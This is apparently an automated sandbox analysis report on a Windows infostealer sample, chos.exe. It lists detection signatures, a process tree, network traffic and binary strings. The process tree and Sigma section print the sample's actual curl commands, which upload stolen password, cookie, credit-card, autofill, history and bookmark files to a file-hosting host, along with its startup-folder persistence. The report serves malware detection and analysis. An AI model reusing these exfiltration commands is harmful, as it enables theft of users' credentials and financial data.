Edit tour

Windows Analysis Report
chos.exe

Overview

General Information

Sample name:	chos.exe
Analysis ID:	1574329
MD5:	c93bc8dcdb9b8c4b49b429b64c182b92
SHA1:	c3f242a8b0eea955e86a95d95e08fb417ac553f2
SHA256:	125e6a6964be32fbc935900b7de62513a0d6cd19c50a51a11b272636fd895ea6
Tags:	exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Drops PE files to the startup folder

Found pyInstaller with non standard icon

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal communication platform credentials (via file / registry access)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

chos.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\chos.exe" MD5: C93BC8DCDB9B8C4B49B429B64C182B92)

chos.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\chos.exe" MD5: C93BC8DCDB9B8C4B49B429B64C182B92)

cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7676 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4136 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 8704 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 9896 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 9964 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 10008 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 10024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 10068 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 10112 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 10128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 10172 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 10188 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 10204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7984 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 8112 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

chos.exe (PID: 9888 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe" MD5: C93BC8DCDB9B8C4B49B429B64C182B92)

chos.exe (PID: 10092 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe" MD5: C93BC8DCDB9B8C4B49B429B64C182B92)

cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3568 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 6468 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 9712 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2352 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5848 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 2848 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 4932 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7692 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5736 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 4864 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 8512 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Sigma Signatures

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\chos.exe, ProcessId: 7564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\chos.exe", ParentImage: C:\Users\user\Desktop\chos.exe, ParentProcessId: 7564, ParentProcessName: chos.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", ProcessId: 4136, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: chos.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: chos.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: geolocation-db.com

Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt			Jump to behavior

Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49760 version: TLS 1.2

Source: chos.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: chos.exe, 00000000.00000003.1426590138.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641456665.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chos.exe, 00000000.00000003.1427464931.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642650213.00000243B8843000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641621400.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: chos.exe, 00000000.00000003.1428914450.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: chos.exe, 00000000.00000003.1428323610.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643743903.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: chos.exe, 00000000.00000003.1428168179.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643387769.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chos.exe, 00000000.00000003.1426840290.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641792858.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: chos.exe, 00000000.00000003.1426422530.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641240155.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: chos.exe, 00000000.00000003.1426422530.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641240155.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: chos.exe, 00000000.00000003.1428399209.0000018B76862000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: chos.exe, 00000000.00000003.1428077354.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643035111.00000243B8849000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: chos.exe, 00000000.00000003.1426590138.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641456665.00000243B8849000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF666DD83B0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD92F0 FindFirstFileExW,FindClose,	0_2_00007FF666DD92F0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF666DF18E4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7392F0 FindFirstFileExW,FindClose,	10_2_00007FF7FD7392F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7383B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	10_2_00007FF7FD7383B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7518E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	10_2_00007FF7FD7518E4

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 162.159.138.232 162.159.138.232

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: geolocation-db.com
Source: global traffic	DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /uploadFile HTTP/1.1Host: store4.gofile.ioUser-Agent: curl/7.83.1Accept: */*Content-Length: 193Content-Type: multipart/form-data; boundary=------------------------cce6b149417beeab

Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1742097208.00000211B8D94000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B7686F000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641621400.00000243B8849000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1644716975.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645659691.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641645391.00000243B8850000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.dig
Source: chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B7686F000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digD
Source: chos.exe, 00000000.00000002.1897980712.0000018B7686F000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645041537.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.2119017318.00000243B8850000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digiD
Source: chos.exe, 00000000.00000003.1427464931.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428168179.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427147151.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427291874.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428399209.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428077354.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1426840290.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428323610.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1643769155.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1661127883.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645853866.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642650213.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1661127883.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641645391.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1659369350.00000243B8850000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: chos.exe, 00000000.00000003.1427464931.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428168179.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427147151.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427291874.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428399209.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428077354.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1426840290.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428323610.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641621400.00000243B8849000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645853866.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1661127883.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641645391.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1659369350.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642232841.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: chos.exe, 00000000.00000003.1427464931.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428168179.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427147151.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427291874.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428399209.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428077354.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1426840290.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428323610.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645853866.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642650213.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1661127883.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641645391.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642232841.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1642232841.00000243B8850000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
